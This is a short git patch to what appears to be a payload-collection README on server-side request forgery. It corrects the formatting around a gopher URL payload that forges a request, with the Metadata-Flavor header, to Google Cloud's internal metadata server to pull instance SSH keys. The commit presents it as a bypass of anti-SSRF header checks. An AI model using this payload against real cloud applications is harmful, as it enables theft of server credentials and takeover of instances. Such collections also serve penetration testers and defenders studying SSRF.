From e024afc9f789f237a0c180763170b6f1c29d83f7 Mon Sep 17 00:00:00 2001
From: mikesiegel <mike.siegel@gmail.com>
Date: Tue, 31 Dec 2019 15:11:58 +0000
Subject: [PATCH] Added anti-SSRF header bypass for GCP.

---
 Server Side Request Forgery/README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 49dac144..88e7db0f 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -504,7 +504,8 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 Required headers can be set using a gopher SSRF with the following technique
 
 ```powershell
-gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a``
+gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
+```
 
 Interesting files to pull out: